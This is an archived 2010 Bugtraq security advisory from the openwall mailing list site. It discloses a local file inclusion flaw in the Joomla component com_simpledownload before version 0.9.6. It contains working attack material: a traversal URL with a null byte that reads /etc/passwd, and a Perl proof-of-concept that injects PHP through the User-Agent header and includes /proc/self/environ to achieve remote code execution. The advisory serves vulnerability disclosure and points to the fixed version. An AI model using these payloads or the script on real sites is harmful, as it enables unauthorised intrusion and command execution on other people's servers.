lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 17 May 2010 01:54:05 -0600
From: jerzy.patraszewski@...il.com
To: bugtraq@...urityfocus.com
Subject: Joomla  component SimpleDownload Local File Inclusion

--[Description]--
A vulnerability has been found in the downloader component for Joomla. It can be exploited in various ways - from sensitive information disclosure to remote code execution.

Input passed to controller is not properly sanitized, allowing attacker to inject php code
via Local File Inclusion combined with Directory Traversal (/proc/self/environ method) and Null Byte Injection, leading to Remote Code Execution.

--[Vendor]--
http://joomla.joelrowley.com/

--[Vulnerable Version]--
com_simpledownload <0.9.6

--[Impact]--
Local File Inclusion
Directory Traversal
Remote Code Execution

--[LFI Exploit]--
/index2.php?option=com_simpledownload&controller=[LFI]%00

--[LFI PoC]--
/index2.php?option=com_simpledownload&controller=
./../../../../../../../etc/passwd%00

--[RCE PoC]--
#!/usr/bin/perl -w
# quick'n'dirty PoC for RCE 
# com_simpledownload <0.9.6
# by <sm0q>
# usage eg.:
# $./expl.pl -h localhost \ 
# -c "<?php passthru('uname -a > uname.txt'); ?>"
use LWP::UserAgent;
use Getopt::Std;
my %o=();
getopts("c:h:",\%o);
die "Usage: $0 -h target_host -c command\n" if ! (defined $o{h} && defined $o{c});
$o{h} =~ s/(http:\/\/)?(.*)/http:\/\/$2/;
my $url="/index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00";
my $lwp = LWP::UserAgent->new;
print  $lwp->get($o{h}.$url, 'User-Agent'=>"$o{c}")->decoded_content;

--[Solution]--
Thanks to quick response from Joel Rowley 
fix released in version 0.9.6 - upgrade 
as soon as possible from:
http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717

--[EOF]--

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ